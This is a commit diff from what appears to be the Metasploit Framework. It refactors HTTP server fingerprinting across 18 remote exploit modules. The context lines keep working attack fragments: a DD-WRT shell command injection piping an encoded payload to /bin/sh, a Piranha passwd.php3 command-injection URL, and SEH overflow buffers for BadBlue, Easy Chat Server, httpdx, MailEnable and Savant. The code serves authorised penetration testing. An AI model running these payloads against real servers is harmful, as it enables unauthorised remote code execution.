http fingerprint checking update

git-svn-id: file:///home/svn/framework3/trunk@9719 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-07-07 17:38:59 +00:00
parent ba76698b5a
commit 663b863b6d
18 changed files with 69 additions and 120 deletions

View File

@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /DD-WRT/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -33,8 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2009-2765' ], [ 'CVE', '2009-2765' ],
[ 'OSVDB', '55990' ], [ 'OSVDB', '55990' ],
[ 'BID', '35742' ], [ 'BID', '35742' ],
[ 'URL', 'http://www.milw0rm.com/exploits/9209'], [ 'URL', 'http://www.milw0rm.com/exploits/9209' ]
], ],
'Platform' => ['unix'], 'Platform' => ['unix'],
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
@ -59,10 +60,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
if not (http_fingerprint =~ /DD-WRT/)
raise RuntimeError, "The target server doesn\'t seem to be running DD-WRT."
end
cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
# TODO: force use of echo-ne CMD encoder # TODO: force use of echo-ne CMD encoder
str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&" str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"

View File

@ -16,6 +16,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -81,11 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
info = http_fingerprint
if not (info =~ /Apache/)
raise RuntimeError, 'The target server is not running Apache.'
end
cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal') cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT" str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
print_status("Sending GET request with encoded command line...") print_status("Sending GET request with encoded command line...")
@ -103,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
print_status("Command successfully executed (according to the server).") print_status("Command successfully executed (according to the server).")
end end
end end
end end

View File

@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => datastore['PATH'] 'uri' => datastore['PATH']
}, 5) }, 5)
info = http_fingerprint({ :response => res }) info = http_fingerprint({ :response => res }) # check method
if (info =~ /Sun/) if (info =~ /Sun/)
print_status("Found server: #{info}") print_status("Found server: #{info}")
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected

View File

@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
http_fingerprint({ :response => res }) http_fingerprint({ :response => res }) # check method
if (res.code != 200) if (res.code != 200)
print_status("The server returned #{res.code} #{res.message}") print_status("The server returned #{res.code} #{res.message}")

View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/' 'uri' => '/'
}, 5) }, 5)
info = http_fingerprint({ :response => res }) info = http_fingerprint({ :response => res }) # check method / Custom server check
if res and res['Server'] if res and res['Server']
print_status("Found RTSP: #{res['Server']}") print_status("Found RTSP: #{res['Server']}")
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected

View File

@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}, 5) }, 5)
http_fingerprint({ :response => res }) http_fingerprint({ :response => res }) # check method
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/)) if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
ver = $1 ver = $1

View File

@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}, 25) }, 25)
http_fingerprint({ :response => res }) http_fingerprint({ :response => res }) # check method
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/)) if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable

View File

@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking Rank = AverageRanking
# XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Seh include Msf::Exploit::Seh
@ -75,31 +77,30 @@ class Metasploit3 < Msf::Exploit::Remote
# Identify the target based on the SecurityGateway version number # Identify the target based on the SecurityGateway version number
def auto_target def auto_target
print_status("Attempting to automatically select a target...") info = http_fingerprint({ :uri => '/SecurityGateway.dll' }) # automatic targetting
res = send_request_raw( if (info =~ /SecurityGateway (1\..*)$/)
{
'uri' => '/SecurityGateway.dll'
}, 10)
http_fingerprint({ :response => res })
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
case $1 case $1
when /1\.0\.1/ when /1\.0\.1/
return self.targets[1] return self.targets[1]
end end
end end
# Not vulnerable # Not vulnerable
return nil nil
end end
def check
if auto_target
Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit def exploit
# handle auto-targeting # handle auto-targeting
mytarget = target mytarget = target
if target.name =~ /Automatic/ if target.name =~ /Automatic/
print_status("Attempting to automatically select a target...")
mytarget = auto_target mytarget = auto_target
if mytarget.nil? if mytarget.nil?
raise RuntimeError, "Unable to automatically select a target" raise RuntimeError, "Unable to automatically select a target"

View File

@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -160,14 +162,13 @@ class Metasploit3 < Msf::Exploit::Remote
def check def check
response = send_request_raw({'uri' => '/'}, 5) response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
if response.nil? if response.nil?
print_status("No response to request") print_status("No response to request")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
http_fingerprint({ :response => response }) # Custom Server header matching
code = Exploit::CheckCode::Appears code = Exploit::CheckCode::Appears
case response['Server'] case response['Server']
@ -196,16 +197,14 @@ class Metasploit3 < Msf::Exploit::Remote
def auto_target def auto_target
response = send_request_raw({'uri' => '/'}, 5) response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
targets_to_try = []
if response.nil? if response.nil?
print_error("No response to request") print_error("No response to request")
return targets_to_try return targets_to_try
end end
http_fingerprint({ :response => response }) # Custom Server header matching / automatic target selection
targets_to_try = []
server_hdr = response['Server'] server_hdr = response['Server']
print_status("Server: #{server_hdr}") print_status("Server: #{server_hdr}")

View File

@ -14,7 +14,11 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
include Msf::Exploit::Remote::Tcp # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
# However, a proper Server header is returned when requesting /index.html or using HEAD.
HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::Seh
def initialize(info = {}) def initialize(info = {})
@ -50,40 +54,27 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'DisclosureDate' => 'Apr 20 2003', 'DisclosureDate' => 'Apr 20 2003',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80)
], self.class )
end end
def check def check
connect info = http_fingerprint # check method
if (info =~ /BadBlue\/2\.5/)
sock.put("GET / HTTP/1.0\r\n\r\n")
resp = sock.get_once
disconnect
if (resp =~ /BadBlue\/2.5/)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
return Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
def exploit def exploit
connect
uri = "GET /ext.dll?mfcisapicommand=" uri = "GET /ext.dll?mfcisapicommand="
sploit = rand_text_alphanumeric(500) sploit = rand_text_alphanumeric(500)
seh = generate_seh_payload(target.ret) seh = generate_seh_payload(target.ret)
sploit[492, seh.length] = seh sploit[492, seh.length] = seh
uri << sploit
print_status("Trying target #{target.name}...") print_status("Trying target #{target.name}...")
send_request_raw({ 'uri' => uri })
sock.put(uri + sploit + "\r\n\r\n")
handler handler
disconnect
end end
end end

View File

@ -14,6 +14,10 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
# However, a proper Server header is returned when requesting /index.html or using HEAD.
HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Seh include Msf::Exploit::Seh
@ -58,11 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
# NOTE: BadBlue doesn't give any HTTP headers when requesting '/', but it will if requesting /index.html
if not (http_fingerprint =~ /BadBlue\//)
raise RuntimeError, "The target server doesn't appear to be running BadBlue."
end
seh_offset = 4116 seh_offset = 4116
sploit = Rex::Text.pattern_create(seh_offset) sploit = Rex::Text.pattern_create(seh_offset)
# Need to jump over the nul byte # Need to jump over the nul byte

View File

@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::Seh
@ -60,10 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
if not (http_fingerprint =~ /Apache/)
raise RuntimeError, "The target server doesn't appear to be running Apache."
end
sploit = rand_text_alphanumeric(5800) sploit = rand_text_alphanumeric(5800)
sploit[5781, 8] = generate_seh_record(target.ret) sploit[5781, 8] = generate_seh_record(target.ret)
# Jump backward to the payload # Jump backward to the payload

View File

@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::Seh
@ -64,27 +66,16 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class ) ], self.class )
end end
def auto_target def check
info = http_fingerprint info = http_fingerprint # check method
# NOTE: Version 2.2 still reports "1.0" in the "Server" header # NOTE: Version 2.2 still reports "1.0" in the "Server" header
if (info =~ /Easy Chat Server\/1\.0/) if (info =~ /Easy Chat Server\/1\.0/)
return targets[0]
end
nil
end
def check
if auto_target
return Exploit::CheckCode::Appears return Exploit::CheckCode::Appears
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
def exploit def exploit
if not auto_target
raise RuntimeError, "The server doesn't appear to be running a vulnerable EasyChatServer"
end
# randomize some values. # randomize some values.
val = rand_text_alpha(rand(10) + 1) val = rand_text_alpha(rand(10) + 1)
num = rand_text_numeric(1) num = rand_text_numeric(1)

View File

@ -28,6 +28,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::Seh
@ -89,23 +91,9 @@ class Metasploit3 < Msf::Exploit::Remote
)) ))
end end
def auto_target
info = http_fingerprint
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
ver = $1
#print_status("HTTPDX version detected : #{ver}")
# this will need to be updated if httpdx is ever fixed :)
case ver
when "1.4"
return targets[0]
end
end
nil
end
def check def check
if (auto_target) info = http_fingerprint # check method
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -113,10 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
if not auto_target
raise RuntimeError, "The server doesn't appear to be running a vulnerable version of HTTPDX"
end
uri = payload.encoded uri = payload.encoded
if target['Offset'] > payload_space if target['Offset'] > payload_space
pad = target['Offset'] - payload_space pad = target['Offset'] - payload_space

View File

@ -226,7 +226,7 @@ For now, that will have to be done manually.
def get_version def get_version
info = http_fingerprint info = http_fingerprint # Custom version extraction / automatic target
if info and (info =~ /httpdx\/(.*) \(Win32\)/) if info and (info =~ /httpdx\/(.*) \(Win32\)/)
return $1 return $1
end end

View File

@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => [ /MailEnable/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -51,9 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
info = http_fingerprint info = http_fingerprint # check method
if (info =~ /MailEnable/)
if (info =~ /.*MailEnable/)
return Exploit::CheckCode::Appears return Exploit::CheckCode::Appears
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -62,7 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
buffer = make_nops(24) + payload.encoded + [target.ret].pack('V') buffer = make_nops(24) + payload.encoded + [target.ret].pack('V')
send_request_raw({ send_request_raw(
{
'headers' => { 'Authorization' => buffer } 'headers' => { 'Authorization' => buffer }
}, 2) }, 2)

View File

@ -15,6 +15,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => /Savant\/3\.1/ }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -69,16 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end end
def auto_target
info = http_fingerprint
if info and (info =~ /Savant\/3\.1/)
return targets[0]
end
nil
end
def check def check
if (auto_target) info = http_fingerprint # check method
if info and (info =~ /Savant\/3\.1/)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -112,11 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
mytarget = auto_target
if not mytarget
raise RuntimeError, 'The target web server is not Savant 3.1'
end
print_status("Searching for a suitable nopsled...") print_status("Searching for a suitable nopsled...")
findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted. findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
until findnop until findnop
@ -124,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
print_status("Found one! Sending exploit.") print_status("Found one! Sending exploit.")
sploit = findnop + " /" + payload.encoded + [mytarget['Ret']].pack('V') sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
res = send_request_raw( res = send_request_raw(
{ {
'method' => sploit, 'method' => sploit,

View File

@ -14,6 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
# XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -68,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def auto_target def auto_target
res = send_request_raw( res = send_request_raw(
{ {
'uri' => datastore['URL'] 'uri' => datastore['URL']
}, -1) }, -1)
http_fingerprint({ :response => res }) # XXX: Needs custom body match
http_fingerprint({ :response => res })
# Was a vulnerable system detected? # Was a vulnerable system detected?
t = nil t = nil